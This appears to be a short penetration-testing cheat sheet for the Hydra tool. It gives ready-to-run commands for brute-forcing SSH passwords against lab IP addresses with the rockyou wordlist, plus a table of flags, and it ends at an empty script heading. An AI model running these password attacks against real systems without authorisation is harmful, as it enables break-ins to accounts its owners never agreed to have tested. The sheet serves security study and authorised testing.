Pre-made commands
Attack the username george on ssh port 2222 at 192.168.50.201
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201Attack a list of usernames (users)
hydra -v -V -u -L users -P /usr/share/wordlists/rockyou.txt -t 4 -u 192.168.225.120 ssh
Flags
| Flag | What it does |
|---|---|
| -L | Word list to use to attack a username |
| -l | Username to attack (Name is known) |
| -P | Word list to use to attack a password |
| -p | Password to use (pw is known) |
Useful Scripts
Useful bash script
#!/bin/bash